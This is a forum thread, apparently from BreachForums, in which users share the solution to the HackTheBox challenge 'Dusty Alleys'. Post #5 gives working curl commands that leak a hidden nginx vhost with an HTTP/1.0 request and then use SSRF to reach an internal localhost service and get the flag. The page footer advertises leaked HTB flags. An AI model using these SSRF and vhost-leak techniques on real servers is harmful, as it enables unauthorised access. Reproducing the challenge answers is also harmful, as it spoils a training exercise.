JOIN BREACHFORUMS TELEGRAM
HTB - Dusty Alleys
by x1rx - Saturday March 29, 2025 at 09:17 AM
Advanced User

Posts: 70
Threads: 7
Joined: Jul 2024
Reputation: 5
#1
Mar 29, 2025, 09:17 AM
Let's solve together
Reply
Breached
Member
Posts: 22
Threads: 1
Joined: Oct 2024
Reputation: 0
#2
Mar 30, 2025, 02:32 AM
Vuln https://security.snyk.io/vuln/SNYK-JS-NODEFETCH-2342118
Reply
Advanced User

Posts: 70
Threads: 7
Joined: Jul 2024
Reputation: 5
#3
Mar 30, 2025, 10:07 AM
1 - nginx http1.0 information leak
2 - ssrf
Reply
Breached
Member
Posts: 104
Threads: 4
Joined: Oct 2023
Reputation: 0
#4
Mar 30, 2025, 12:08 PM
What is the parameter to use?
Reply
Breached
Member
Posts: 42
Threads: 2
Joined: Aug 2024
Reputation: 5
#5
Mar 30, 2025, 01:49 PM
#get vhost by downgrade to http1.0
curl http://$IP:$PORT/think --http1.0 -H 'Host:'

#get flag
curl http://$IP:$PORT/guardian?quote=http%3A%2F%2Flocalhost%3A1337%2Fthink -H 'Host: guardian.firstalleyontheleft.com'
Reply
Breached
Member
Posts: 22
Threads: 1
Joined: Oct 2024
Reputation: 0
#6
Mar 30, 2025, 03:28 PM (This post was last modified: Mar 30, 2025, 03:32 PM by pop10189.)
(Mar 30, 2025, 01:49 PM)ent0xE Wrote:
#get vhost by downgrade to http1.0
curl http://$IP:$PORT/think --http1.0 -H 'Host:'

#get flag
curl http://$IP:$PORT/guardian?quote=http%3A%2F%2Flocalhost%3A1337%2Fthink -H 'Host: guardian.firstalleyontheleft.com'

i dont understand the downgrading to expose the vhost, can you explain ?
(Mar 30, 2025, 03:28 PM)pop10189 Wrote:
(Mar 30, 2025, 01:49 PM)ent0xE Wrote:
#get vhost by downgrade to http1.0
curl http://$IP:$PORT/think --http1.0 -H 'Host:'

#get flag
curl http://$IP:$PORT/guardian?quote=http%3A%2F%2Flocalhost%3A1337%2Fthink -H 'Host: guardian.firstalleyontheleft.com'

i dont understand the downgrading to expose the vhost, can you explain ?

 Ohh nvm, now i understand In HTTP/1.0, the Host
header is optional. If the client does not send it, Nginx does not know which vhost to serve and will default to the first defined
server
block, which is: server_name alley.$SECRET_ALLEY
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 10 581 33 minutes ago
Last Post: chufoni
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 28 2,820 35 minutes ago
Last Post: chufoni
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 375 93,492 46 minutes ago
Last Post: Johe
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 604 92,596 47 minutes ago
Last Post: Johe
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 7,987 2 hours ago
Last Post: char0n1507

Forum Jump:


 Users browsing this forum: 1 Guest(s)